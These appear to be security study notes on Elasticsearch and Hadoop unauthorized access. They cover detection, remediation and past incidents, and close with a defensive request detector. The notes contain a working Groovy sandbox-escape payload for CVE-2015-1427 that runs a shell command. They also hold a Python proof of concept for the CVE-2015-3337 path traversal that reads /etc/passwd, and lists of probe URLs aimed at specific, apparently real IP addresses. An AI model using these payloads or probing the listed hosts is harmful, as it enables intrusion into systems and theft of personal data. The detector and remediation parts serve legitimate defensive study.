Basic notes
VulBOX
https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html
Further reading
https://www.ichunqiu.com/course/1413
Redis unauthorized access
Other NoSQL unauthorized access
MongoDB, Redis, ES, Memcached, Hadoop
Vulnerability description
ElasticSearch is an enterprise search service written in Java. Starting the service opens port 9200 by default, and anyone who can reach that port can read and modify the data it holds without authorization.
Vulnerability detection
Default port: 9200, HTTP protocol.
The response body contains "You Know, for Search".
(AWVS can also find it.)
Generally, hosts with this problem are mostly ElasticSearch instances running the default configuration.
(A quick check only looks at 9200; if you are the owning organization, you should still sweep every port.)
So it is enough to probe 9200. If the service is not on 9200, that usually means the ops or development team has already given some thought to security, and there is no need to dig further.
Some useful URLs
Node URLs
```
http://101.198.161.130:9200/_cat/indices/
http://101.198.161.130:9200/_plugin/head/
http://101.198.161.130:9200/_nodes
http://101.198.161.130:9200/_nodes?prettify
http://101.198.161.130:9200/_status
http://101.198.161.130:9200/_search?pretty
http://10.203.9.131:9200/zjftu/
http://10.203.9.131:9200/zjftu/_search?pretty
```
Hadoop unauthorized access
```
http://103.15.200.81:50070/dfshealth.jsp
http://103.15.200.81:50070/logs/
```
Impact
Data can be manipulated without authorization, affecting the site's data.
Remediation
1. Close port 9200.
2. Block external access to this port on the firewall.
Past incidents
Security Pulse (secpulse) search
WooYun mirror search
CNVD search
1 A 360 Mobile Elasticsearch unauthorized access (2016-04-19)
https://www.secpulse.com/archives/46394.html
2 Baofeng (暴风) site Elasticsearch unauthorized access & Hadoop unauthorized access (2016-04-27)
https://www.secpulse.com/archives/49115.html
3 Xinhuanet channel server Elasticsearch misconfiguration / arbitrary operations / interviewee information exposed (2016-03-19)
https://www.secpulse.com/archives/46976.html
(ElasticSearch RCE)
4 神器而已 securities series: Jiuzhou Securities (九州证券) site Elasticsearch remote code execution (2015-09-11 18:30)
(includes a few internal-network techniques)
https://www.secpulse.com/archives/39822.html
5 Funshion (风行) site Elasticsearch misconfiguration (arbitrary file read)
https://www.secpulse.com/archives/41126.html
6 A Shanghai server Elasticsearch misconfiguration / arbitrary operations / large amount of sensitive information (names, ID numbers, ethnicity, check-in and check-out times, room numbers, etc. of more than 7.9 million users) (2016-03-16)
https://www.secpulse.com/archives/46801.html
7 Guangxi Mobile Elasticsearch misconfiguration / arbitrary operations / large amount of sensitive information (user phone numbers, IMEI, IMSI, online times and locations, etc.)
https://www.secpulse.com/archives/46798.html
ElasticSearch Groovy RCE (CVE-2015-1427)
Affected versions
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
Send a POST request to the following URL:
http://127.0.0.1:9200/_search?pretty
with the following POST body:
```json
{
  "size": 1,
  "script_fields": {
    "iswin": {
      "script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()",
      "lang": "groovy"
    }
  }
}
```
A few other exploits
https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.csdn.net/u011066706/article/details/51175761
es_poc_1.py
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# es_poc_1.py: probe the _plugin/ handler for the path traversal of CVE-2015-3337
import requests

host = "10.203.9.131"
port = 9200


def elastic_directoryTraversal(host, port):
    # Site plugins whose static files Elasticsearch 1.x served from _plugin/<name>/
    pluginList = ['test', 'kopf', 'HQ', 'marvel', 'bigdesk', 'head']
    # A plain "../" traversal plus two variants that encode each dot as overlong UTF-8 (%c0%ae)
    pList = [
        '/../../../../../../../../../../../../../../etc/passwd',
        '/' + '%c0%ae%c0%ae/' * 10 + 'etc/passwd',
        '/' + '%c0%ae%c0%ae/' * 10 + 'windows/win.ini',
    ]
    for p in pluginList:
        for path in pList:
            urlA = "http://%s:%d/_plugin/%s%s" % (host, port, p, path)
            try:
                content = requests.get(urlA, timeout=5, allow_redirects=True,
                                       verify=False).content.decode('utf-8', 'replace')
                print(content)
                print("\n-------------------------------------------------------------\n")
                # A passwd file in the response means the traversal escaped the plugin directory
                if "/root:/" in content:
                    print('Elasticsearch arbitrary file read (CVE-2015-3337) Found!')
            except Exception as e:
                print(e)


elastic_directoryTraversal(host, port)
```
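As an added detection example (not code from this page's author or from any of the linked write-ups), the following Python inspects HTTP requests to the Elasticsearch REST port for the three exposure patterns this page covers: unauthenticated reads of the cluster-info endpoints listed under the useful URLs, the Groovy script_fields payload of CVE-2015-1427, and the overlong-dot traversal under _plugin/ of CVE-2015-3337. The endpoint list, the regex, the finding tags and the sample requests are my own assumptions, constructed for the example.

```python
import json
import re
from urllib.parse import unquote, urlsplit

# Overlong UTF-8 forms of "." and "/" used to smuggle "../" past the plugin path check (CVE-2015-3337)
OVERLONG = {"%c0%ae": ".", "%c0%af": "/"}
# Read-only endpoints that disclose cluster state and data when 9200 is reachable without auth
INFO_ENDPOINTS = ("/_cat/", "/_nodes", "/_status")
# Groovy constructs used to break out of the script sandbox and spawn processes (CVE-2015-1427)
DANGEROUS_GROOVY = re.compile(r"forName\(|getRuntime\(\)|\.exec\(|ProcessBuilder")

def normalize_path(raw_path):
    # Lower-case, undo overlong encodings, then percent-decode, so "../" cannot hide behind %c0%ae
    path = urlsplit(raw_path).path.lower()
    for encoded, char in OVERLONG.items():
        path = path.replace(encoded, char)
    return unquote(path)

def inspect_request(method, raw_path, body):
    """Return finding tags for one HTTP request seen on the Elasticsearch REST port."""
    findings = []
    path = normalize_path(raw_path)
    if path.startswith("/_plugin/") and "../" in path:
        findings.append("plugin-path-traversal")
    if method == "POST" and path.endswith("/_search") and body:
        try:
            doc = json.loads(body)
        except ValueError:
            doc = {}
        script_fields = doc.get("script_fields") if isinstance(doc, dict) else None
        if script_fields and DANGEROUS_GROOVY.search(json.dumps(script_fields)):
            findings.append("groovy-script-exec")
    if method == "GET" and path.startswith(INFO_ENDPOINTS):
        findings.append("cluster-info-endpoint")
    return findings

# Constructed sample requests in the shape of the payloads this page discusses (not real traffic)
GROOVY_BODY = json.dumps({"size": 1, "script_fields": {"iswin": {"lang": "groovy",
    "script": 'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id")'}}})
SAMPLE_REQUESTS = [
    ("POST", "/_search?pretty", GROOVY_BODY),
    ("GET", "/_plugin/head/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd", ""),
    ("GET", "/_cat/indices/", ""),
    ("POST", "/zjftu/_search?pretty", json.dumps({"size": 1, "query": {"match_all": {}}})),
]

def scan(requests=SAMPLE_REQUESTS):
    """Map 'METHOD path' to its findings; requests with no findings are left out."""
    return {f"{m} {p}": tags for m, p, b in requests if (tags := inspect_request(m, p, b))}
```

Feed it (method, path, body) tuples parsed from the access log of the reverse proxy in front of 9200; the normalization step matters because a filter that only looks for the literal "../" misses the %c0%ae variants the PoC above sends.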